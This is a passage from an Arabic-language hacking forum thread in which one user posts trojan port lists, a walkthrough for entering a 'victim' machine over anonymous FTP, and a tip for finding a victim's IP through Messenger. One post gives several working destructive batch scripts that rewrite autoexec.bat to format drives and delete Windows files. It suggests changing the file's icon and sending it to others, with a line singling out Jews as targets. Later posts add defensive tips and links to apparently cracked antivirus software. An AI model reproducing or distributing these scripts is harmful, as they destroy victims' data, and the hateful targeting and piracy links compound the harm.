12346 TCP GabanBus, NetBus, X-bill
12361 TCP Whack-a-mole
12362 TCP Whack-a-mole
12631 TCP WhackJob
13000 TCP Senna Spy
16969 TCP Priority
20000 TCP Millennium
20001 TCP Millennium
20034 TCP NetBus 2 Pro
21544 TCP GirlFriend
22222 TCP Prosiak
23456 TCP Evil FTP, Ugly FTP
26274 UDP Delta Source
29891 UDP The Unexplained
30029 TCP AOL Trojan
30100 TCP NetSphere
30101 TCP NetSphere
30102 TCP NetSphere
30303 TCP Sockets de Troie
31337 TCP Baron Night, BO client, BO2, Bo Facil
31337 UDP BackFire, Back Orifice, DeepBO
31338 TCP NetSpy DK
31338 UDP Back Orifice, DeepBO
31339 TCP NetSpy DK
31666 TCP BOWhack
31789 TCP Hack'A'Tack
33333 TCP Prosiak
34324 TCP BigGluck, TN
40412 TCP The Spy
40421 TCP Agent 40421, Masters Paradise
40422 TCP Masters Paradise
40423 TCP Masters Paradise
40425 TCP Masters Paradise
40426 TCP Masters Paradise
47262 UDP Delta Source
50505 TCP Sockets de Troie
50766 TCP Fore
53001 TCP Remote Windows Shutdown
54321 TCP School Bus
60000 TCP Deep Throat
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:22 am

كيف تحافظ على الباس وورد؟؟؟؟

اشترك احد الاخوه فى الانترنت ... وقد طلب عدد 100 ساعه لاشتراكه .. وبعد ان بدا فى الدخول الى الانترنت وبعد مضى اسابيع قليله اتصل بالانترنت ولاكنه استغرب ان مقدم الخدمه لا يوصله بالانترنت وان الرساله التى ترده ان اسم المستخدم غير صحيح ... قام بالاتصال بمقدم الخدمه للاستفسار .. ولاكنه استغرب اكثر عندما تم اخباره بان عدد الساعات التى طلبها قد تم استخدامها كاملا .. ولاكنه فى الحقيقه لم يستخدم سوى عشره او عشرون ساعه فكيف حدث ذلـــــــــــــــك

--------------------------

الجواب انه عندما يغزو جهازك احد الهاكرز فان معظم برامج الهاكرز بها خاصيه سرقه الباص وورد واسم المستخدم .... ولاكن مع ذلك يمكن تجنب حدوث مثل هذا الامر ببساطه .. فالوقايه خير من العلاج ..

عندما تقم بتسيل معلوماتك التى تستخدمها فى الاتصال او فى البريد فانك تجد امامك صفحه تدخل بها اسم المستخدم والرقم السرى .. كما تجد خاص[/
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:25 am

أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
21
مفتوح و هو البورت الخاص بال FTP
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها
Superscanne
بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
سوف تطلع لك نافدة في الدوس مكتوب عليها
FTP>
الحين لهنا كل شي تمام بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
سوف تتحصل على النتيجة التالية
FTP>
To
أكتب بجانب
To
رقم الإبي للضحية ثم إضغط على إدخال
والحين خل بالك وياي لا تسرح تفكر في شي ثاني

اذا شفت هذا الرد الرد لقد تخطيت خطوة
Connected to www.assassin.com <http://www.assassin.com>
220 websrv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp>quote user ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail name) as password.
و الآن أكتب الكتابة التالية
ftp>quote cwd ~root
إذا تحصلت على هدا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp>quote pass ftp
إذا تحصلت على هذا الرد فقد تخطيت خطوة
و نجحت في الإقتحام

230 Anonymous user logged in.
مبروك أنت الآن في جهاز الضحية
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و اذا بغيتوا ان تضحكو بقا أكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء و لهذا
حظرت لكم الاوامر

Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب مال جهازك
مثال
Get black.exe
Put
العملية العكسية ل
Get
يعني تأخد ملف من سطح المكتب مال جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Close
لقطع الإتصال مع الضحية
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:30 am

استرجاع الايميل المسرووووق
للاخوان الذين سرق ايميلاتهم او فقدو كلمه السر والسكيورتي معا فهناك طريقه لاسترجاعها

: ماعليك فعله هو التالي
تقوم بإرسال رسالة إلى شركة الهوتميل على

service_x@hotmail.com


PW VERIFICATION INFO ENCLOSED : وتكتب عنوان الرسالة

وتملأ هذا النموذج

- first mane : أسمك الأول
- last mane : أسمك الأخير
- Birth date : تاريخ عيد ميلادك
- Sign-in name : ايميلك المسروق
- Country/region : الدولة
- State : المدينه
- Zip or postal code : الكودرقم
- Approximate date of last successful sign-in or approximate date of account registration : تاريخ آخر يوم فتحت إيميلك
- The name of your ISP :
- As many "old" outdated passwords you used in the past as you can remember وهنا تكتب كلمات السر القديمة التى تتذكرها

وبعد الإنتهاء ....تقوم بإرسالها

وستصلك هذه الرساله مباشره بعد ارسال المعلومات هذا نصها
This is an auto-generated response designed to let you know our system received
your support inquiry.

We respond to inquiries in the order received, and a Hotmail Support
Representative will address your specific issues as promptly as possible. You
should hear from your Support Representative soon.

Remember that MSN Hotmail also has comprehensive online help available--just
click "Help" in the upper right corner.

Please لاe that you will لا receive a reply if you respond directly to this
message.

اذا كانت المعلومات ناقصه اوغير صحيحة ستاتيك هذه الرساله
Hello abcd_110,

Thank you for writing to MSN Hotmail. This is Janice, and I am writing in
response to your password concerns.

Kindly provide the following information for verification purposes.

- Name (first and last)
- Sign-in name
- Birth date
- Country/region
- State
- Zip or postal code
- Approximate date of last successful sign in or approximate date of account
registration

If you provide all of the information requested and it is correct, Hotmail
resets your password and sends it by e-mail to the address from which you sent
your request. As soon as you can gain access to your account, change your
password and your secret question.

>>> To change your secret question

1. Click "Options" to the right of the "Address Book" tab. The "Options" page appears.
2. Under "Your Information", click the "Secret Question" link. The "Secret
Question" page appears.
3. Type your password in the box provided: below that, type your new secret
question and its answer.
4. Click "OK" to complete the change or "Cancel" to return to the "Options" page without changing your secret question.

Note: If you are using a non-English version of Hotmail, remember that you must type your password, like your sign-in name, in Standard English-based text.

Before you sign in with your new password, consider selecting the "Remember my
Sign-In Name and Password" option. Then when you quit Hotmail and return,Hotmail automatically signs you in and sends you directly to your Inbox.

Note: If you do لا sign in to your Hotmail account for 30 days or within the
first 10 days after you set up your account, Hotmail marks your account as
"Inactive." Your stored e-mail messages are deleted, and inbound messages are
returned to the sender. Your Passport still functions, and your Hotmail sign-in name is reserved.

To reactivate your account, go to:
http://www.hotmail.com/ /> Type your sign-in name and password.

If your account remains "Inactive" for 90 days, Hotmail permanently deletes it.

Hotmail ensures your e-mail privacy by requiring that you use a password to gain
access to your Hotmail account. Do NOT share your password with anyone, even
someone claiming to work for Hotmail. Hotmail employees will never ask you to
provide your password to them over the phone or by e-mail.

Remember that MSN Hotmail also has comprehensive online help available--just
click "Help" in the upper right corner.

Sincerely,

Janice G.
MSN Hotmail Customer Support

اذا كانت البيانات التى ارسلتها مقنعه سيرسلون لك هذه الرساله بعد ساعة أو بالكثير 3 ساعات وبها كلمة السر
Hello MSN Hotmail Member,

Thank you for writing to MSN Hotmail.

We appreciate the opportunity to assist you. We have reset your password to:كلمة السر


After you regain access to your account (الاميل@hotmail.com), please
follow the steps given below to change the password
1. Click "Options" to the right of the "Address Book" tab.
2. Under "Your Information", click the "Password" link.
3. Input the new password and click OK.

Also, due to the security reasons we have deleted your secret question and
answer, I suggest you to create Password Hint Question and Answer so you can use
the automated password retrireview system. Click the “Secret question” link under
“Your Information”

1. The "Secret Question" page appears.
2. Type your password in the box provided. Below that, type your new secret
question and its answer.
3. Click "OK" to complete the change or click "Cancel" to return to the
"Options" page without changing your secret question.

For your security and convenience, make sure that the answer to your secret
question is:

>>> At least five characters in length.
>>> Something only you know.
>>> Not related to your password or member name in any way.
>>> Unlikely to change over time.
>>> Extremely difficult for others to guess, even if they see your secret
question.

Some examples of good secret questions are:

>>> What are the last five digits of my credit card?
>>> What are the last five digits of my social security number?
>>>What is my mother's maiden name?

Hotmail ensures your e-mail privacy by requiring that you use a password to
gain access to your Hotmail account. Do NOT share your password with anyone,
even someone claiming to work for Hotmail. Hotmail employees will never ask you
to provide your current password to them over the phone or by e-mail.

Note: Your password is case sensitive, so be aware of any letters that you
capitalize.

Remember that MSN Hotmail also has comprehensive online help available--just
click Help in the upper right corner.

Sincerely,

Deepa M.

Your satisfaction with my Customer Service is very important to me. If you
consider your issue resolved, please click on the link below to let me know how
I am doing. With your comments please include my name and ticket number (found
in this mail's subject line) to help me keep track of my performance

Customer Service Survey : http://www.surveyhost.com/hotmail2/ />
ولايفوتنى ان انبه انه بعد استرجاع ايميلك ان تتخذ الخطوات الاتيه:
1 - تغيير السؤال السرى والدوله المسجل بها .
2 - تغيير كلمة السر كما وضحت سابقا وحفظ التغييرات فى مفكره خارجية حتى لا يسرق مرة أخرى.
3 - إنشاء مجلدين جديدين في الحساب وتسميتهم باسماء تحفظونها .
فذكر اسم هذان المجلدان يساعد في عملية استعادة البريد المسروق
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:33 am


بسم الله الرحمن الرحيم

اليوم راح اعلمكم شيء مهم ومفيد لكل مبتداء ومن لدية خبرة بسيطة وهو كيفية ايجاد الip الضحية عبر الماسنجر والطريقة سهل وراح اشرحها باصور

:::::::::::::نبدأ الشرح :::::::::::::

اول شيء

نروح ابدا عشان نشغل الدوس



شغل DOS
بعدين حاول ترسل او تستقبل اي ملف من الضحية



بعيدين نرجع على ال DOS



ونكتب الأمر كما ظهر في صورة


اتبع الصور وشوف ip ضحية











الip الي على اليمين في اخر سطر هو ip الضحية ديمن

و انى سيرفيس
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:36 am

الان كيفيه صناعه الفيروسات
هل تريد صنع فيروس وارساله الى الاجهزه اليك هذه الطريقه التى بواستطها تسطيع انا تمحو كل ما على كمبيوتر صيدقك قى 10 ثوان
بسم الله الرحمن الرحيم
اول شي افتح الدفتر او المفكره وليس الورد

وتنسخ الكود الازرق الي تحت وتضعه في المفكره و تعمل حفظ باسم وتكتب اسم الملف

الاسم مثلا not
تكتب not.bat وسيحفظ على شكل مربع ابيض داخله ترس اصفر بس لا تحاول

ولا تفكر تفتح الملف بعد صنعه وارسله فقط لليهود

وهذي الفيروسات مع عملها بس لا تنسخ عمل الفايروس في المفكره

فايروس عمل فورمات على C,D,E,F
0000FF
عمل فورمات C,D,E,F والطابعه

call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo I love my girl
echo Smart Hacker

عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز

call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo I love my girl
echo Smart Hacker
c:\windows\rundll.exe user.exe,exitwindowsexec

عمل فورمات C,D,E,F والطابعه وقفل الجهاز
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo I love my girl
echo Smart Hacker
c:\windows\rundll32.exe user.exe,exitwindows
قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره

@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
echo Smart Hacker

قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز

call attrib -h -r c:\autoexec.bat >nul
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
echo Smart Hacker

عمل فورمات للجهاز فورا

code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat--------------------------------------------------------------------------------

اهم فايروس فايروس مدمر

echo off@

cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
وبعد عمل الملف يمكنك تغير ايقونة الملف بطريقه الضغط عليه
باليمين واختر خصائص
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:38 am

اعلم اخى واختى الافاضل ان عالم الانترنت كما هو ملى بالمعلومات فهو ايضا ملى بالمشاكل كما هو الحال مع مخترقى الاجهزه فكلنا نعلم ما يحدث فى عالم الانترنت من اختراقات لخصوصيات الاخرين لذا وجب عليك اتخاذ الاحتياطات الامنيه التى تحقق لك الامان فى عالم ملى بالوحوش



اولا .. لا تحتفظ تحت اى ظرفا من الظروف باى صورا شخصيه مهما كلفك الامر انما قم بنقلها على فلوبى دسك وتاكد من مسحها حتى من سله المهملات ... واحذر خاصه اخواتنا مستخدمات الانترنت .. اما اذا كنت تظن ان سرقه الصور من جهازك مستحيله فانت على خطا .. بالعكس ان الصور تشكل اول الغنائم التى يبحث عنها مخترقى الاجهزه



ثانيا .. لا تحتفظ باى معلومات شخصيه فى داخل جهازك كرسائل او غيرها من معلومات بنكيه مثل ارقام الحسابات او البطائق الائتمانيه .. حتى اسمك الذى قمت بتسجيله عند تركيب الوندوز قم على الفور بتغييره .. وان كنت لا تعرف كيف .. اتجه الى صفحه المعلومات وخدع المواقع وسوف تتعرف على الطريقه وهى سهل جدا

كيف يتم اختراق جهازي؟؟

يتسال الكثير منا كيف يتم اختراق الاجهزه .. وهل يمكن اختراق اى جهاز .. وهل من السهوله اختراق الاجهزه .. ولكى نقم بشرح العمليه لكم يجب توضيح بعض المصطلحات المستخدمه وترجمتها من الانجليزيه الى العربيه

IP = وتعنى البرتكول المستخدم فى الانترنت

IP-No = رقم مقدم الخدمه

Server = الخادم

Client = ال**ون او العميل

Patch or Torjan = اسماء مستخدمه لملفات التجسس

Port = البورت او المنفذ





-------------------------------------------------------------------------------------


-------------------------------------------

لا يمكن ان يخترق جهاز شخص ما بعينه اى شخص بالتحديد الا بمعرفه رقم ..الاى.بى... الخاص بجهازه ..ورقم الاى بى المستخدم او الارقام المستخدمه تسمى دينامك نمبر اى انها متغيره وغير ثابته ... بمعنى اخر لنفرض انك اتصلت بالانترنت ووجدت ان رقم الاى بى الخاص بك هو

212.123.123.345

ثم خرجت من الانترنت او اقفلت الاتصال ثم عاودت الاتصال بعد خمس دقائق فان الرقم يتغير على النحو الاتى ..كمثال

212.123.123.201

-------------------------------------

اما عن الطريقه التى يمكن بها الدخول الى جهاز شخص معين فان ذلك يتم عندما تكن مستخدما لاحد البرامج التى تستخدم فى المحادثه ..مثل برنامج الاسكيو الشهير .. والذى يعتبر من اكبر مخاطره انه يمكنك الكشف عن ارقام ...الاى . بى ... لمستخدميه مهما حاولوا اخفاءه ...



كيف تصاب الاجهزه بملفات التجسس او الفايروس ؟؟

ان اكبر واسرع طرق لانتشار ملفات التجسس او الفايروسات باحد الطرق الثلاثه

اولا .. اما بارسالها مباشره الى جهازك عن طريق برامج المحادثه عندما يقم احدهم بارسال ملف اليك .. وقد خدع الكثير وللاسف واصيبت اجهزتهم بملفات تجسس او ملفات فايروسات مدمره عن طريق ارسال صورا اليهم ... فقد يجهل الكثير انه بالامكان وببساطه ادخال ملف تجسس او فايروس داخل صوره باستخدام برامج كثيره وبدون ان يشعر الشخص المستقبل للصوره بشى بل العكس سوف يرى الصوره وبشكل طبيعى ولاكنه يجهل ان الملف قد تم ارساله الى جهازه ... ويستطيع ايضا من لهم خبره فى البرمجه على الفيجول بيسك او السى بلس بلس او غيرها ان يصنع برنامج خاص به يساعده على اضافه اى ملف داخل صور او غيرها

-------------------------

ثانيا ... الارسال بواسطه الاميل فكثير منا ترده رسائل من مصادر لا يعرفها وبها ملفات مرفقه يقم بانزالها

-------------------------

ثالثا

بانزال برامج من مواقع مشبوه

-----------------------------------------------------------------

اذا ما هو الحل

الحل بسيط ومريح جدا

اولا ... لا تستقبل اى ملف من اى شخص عند استخدام برامج التشات ..الا من شخص تعرفه معرفه شخصيه

ثانيا .. عند وصول اى اميل من مصدر مجهول .. لاتخاطر بفتحه بل وعلى الفور قم بازالته فلن تخسر شيئا

ثالثا .. لا تقم بانزال اى برنامج من مواقع مجهوله الا ان كانت لديك برامج كاشفه عن الفايروسات وملفات التجسس ... كما اننى انصح بان لا تستخدم الانترنت الا بوجود برنامج مثل ... نورتن انتى فايروس الفين وان تعمل له اب ديت كل اسبوعين ..اى ... اى تجديد للمعلومات ... وهو برنامج لا غنى عنه لانه يتعرف على ملفات التجسس او الفايروسات ويمكنه من معالجتها فى جهازك بدون الاضرار بنظام التشغيل

طرق الكشف عن ملفات التجسس؟؟

توجد العديد من الطرق للكشف عن ملفات التجسس ولاكننى فى الحقيقه افضل استخدام برامج تقم بذلك مثل ما سبق ان ذكرنا برنامج ...نورتن انتى فايروس .... لانه بوجود اى خطا فقد تمسح ملف يحتاجه النظام او بالاصح نظام تشغيل الوندوز ... ولاكننى سوف اذكر الى اين تتجه ملفات التجسس فقط للمعرفه والتوضيح

---------------------------------------------

Registry

تعتبر منطقه الريجسترى هى المنطقه المهمه فى بدا تشغيل الوندوز .. اى ان البرامج التى تحتاج ان تعمل عند بدايه تشغيل الوندوز يجب ان تسجل فى هذه المنطقه .. لماذا ... لانه عند تشغيل الوندوز فان تلك المنطقه تشغل كل تلك البرامج الموجوده بها لتكون فعاله عن بدا الوندوز ...لذا توضع فيها ملفات التجسس لتحث الوندوز على تشغيلها وفتح المنافذ الخاصه ببرامج التجسس

ويمكنك الوصول الى تلك المنطقه بعمل الاتى

اولا ... اتجه الى ....ستارت... ابدا

START

ثم اطلب الامر ... تشغيل

RUN

سوف تظهر لك شاشه بيضاء .. اكتب الامر الاتى

regedit

ثم اضغط على اوكى

عندها سوف تظهر لك شاشه تسمى شاشه الريجسترى.... اختر منها الملف هاى كى لوكل مشين

HKEY_LOCAL_MACHINE

واضغط مرتين على الملفات الاتيه بالترتيب اى عند وصولك للملف اضغط مرتين عليه لكى

تصل للملف الذى يليه بالترتيب

HKEY_LOCAL_MACHINE

ثم

Software

ثم

Microsoft

ثم

Windows

ثم

CurrentVersion

ثم

Run او Run Once

عنمدا تصل الى ..رن .. او ... رن ونص ... انظر الى يمين الشاشه سوف تفتح لك ملفات التشغيل الخاصه بالبرامج ... هنا توجد ملفات التجسس ان وجد
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:40 am

واخر ما اقدمه اليوم بعض طرق الهاكرز الحديثه
(فان اردت الدفاع عن نفسك يجب معرفه اسلوب الغازى)


بسم الله الرحمن الرحيم




ان دراسة اساليب الاختراق والالمام بخدع المخترق
هي احد الطرق الاكيدة والفعالة والمباشرة للحماية من الاختراق
وتساوي فى اهميتها تركيب اعظم برامج الحماية

فلم تعد الطرق التقليدية والتى عرفها المخترق فى الماضي
تشبع كثيرا رغبتة وطموحه لتحقيق اهدافه المعلنة وغير المعلنة،
فقد لاحقته وسائل الاعلام بالاساليب المختلفة لتوعيةالمستخدم
والتحذير من الوقوع فى براثنه وحيله كما طورت برامج الحماية
بكافة اشكالها لوقف مكايد ودحر خطط المخترق
ولكن لم يقف المخترق مكتوف الايدي فهناك صراع متزامن
دائما بين الخير والشر فقام المخترق بتطوير وسائله
من الخداع والمراوغة لاصطياد فريسته


تهدف هذه الدراسة الى توعية القارئ فى جملة بسيطة الى احدث
اساليب ووسائل المخترق بهدف الحماية الذاتية
التى ثبت اهميتها القصوى فى اطار الصراع المتزامن بين الطرفين
(الهاكرز VS برامج الحماية)




استعراض بعضا من تلك الوسائل
اولا
Trojany

لم يقتنع الهاكرز كثيرا بارسال تروجان للضحية
بحجم 200- 400 - 600 - .. ك بايت اذ يتوقع المستخدم
من هذا الحجم برنامج قابل للتنفيذ وليس رسالة خطا تدفعه للشك
كذلك فى حالة ربط التروجان مع احد البرامج الحميدة
فبعد التنفيذ سيختفي التروجان الاصلي ويظل الملف الحميد
melt server after execution
ولذلك يلزم ان يكون فرق الحجم ضئيل جدا بين حجم الملف الحميد
وبين الملف النهائي بحيث لايزيد الفرق عن 3- 4 ك بايت
فى اسوأ الحالات لتفادي شك المستخدم
لذ اعتبر ان الحجم هو احد التحديات
فطور الهاكرز نوعين من البرامح والتقنيات


النوع الاول
برامج يطلق عليها الداون لدورز web downloaders
تقوم بتكوين تروجان لايزيد حجمه عن 1- 4 ك بايت
وهو ماسيرسل للمستخدم وبمجرد تشغيله يقوم بتحميل
التروجان الاصلي ذو الحجم الاكبر والمرفوع مسبقا
الى موقع الهاكرز مباشرة الى جهاز الضحية
بل وتنفيذه دون تدخل الهاكرز وتحقيق الاصابة


النوع الثاني
برامج يطلق عليها uploaders
تلك البرامج ايضا تقوم بتكوين سيرفر صغير الحجم
يتراوح بين 8 - 16 ك و بمجرد ان يقوم المستخدم
بتشغيله يمتلك المخترق بورت مفتوح يمكن من خلاله تحميل
التروجان الكبير، وتكمن خطورة تلك البرامج انها تتحكم فى كافة
العمليات النشطة بنظام التشغيل windows and tasks processes
....................................
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 1:42 am

والان اعتقد انى قد شملت موضوع الهكرز بليز لو حد عنده اى استفتسار يقول
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 11:22 am

والان جاء وقتكم مع الحمايه واول برنامج والبرنامج الذى يخشاه جميع الهاكرز الا وهو برنامج
Hacker_Defense_Suite_Professional16
والبرنامج سهل مش محتاج شرح وتم رفعه بمعرفتى على هذا الملف
حمل من هنااااااااااااااااااااااااا
وباسورد فك الضغط maxpayen
......................
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: hakers x hakers دروس وبرامج ...(متجدد)

مُساهمة من طرف Eng.Maxpayen في الخميس سبتمبر 20, 2007 11:39 am

السلام عليكم

برنامج كاسبر النسخه النهائيه




ومن جديد نقدم لكم عملاق الحمايه باحدث و اخر نسخه مع التسجيل و البرنامج بنسختين و احدة انتي فايروس و الاخرى انترنيت سكيوريتي و الذي يمتاز بمكافحته للفايروسات و التروجان و السباي وير و الفاير ووول و غيرها من المميزات العديده

Kaspersky Anti-Virus 2007 7.0.0.125 - Final





صورة توضح نجاح مفتاح التسجيل



وايضا صورة للبرنامج وهو بيستكمل ال update



ولمن اراد معرفة الاصلح لتحميله من البرنامجين



الجوائز



Size: 21.4 MB

التحميل شامل مفتاح التسجيل

http://www.fut4arab.com/download/pro...0-%20Final.rar

Kaspersky Internet Security 2007 7.0.0.125 - Final

Size: 22.6 MB

التحميل شامل مفتاح التسجيل

http://www.fut4arab.com/download/pro...0.0.125%20.rar

تحياتى للجميع
avatar
Eng.Maxpayen
مؤسس عالم الفن
مؤسس عالم الفن

عدد الرسائل : 1096
البلد : ISMAILIA
اللقب : Dark.King
تاريخ التسجيل : 09/09/2007

معاينة صفحة البيانات الشخصي للعضو http://Dark.King

الرجوع الى أعلى الصفحة اذهب الى الأسفل

صفحة 2 من اصل 2 الصفحة السابقة  1, 2

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى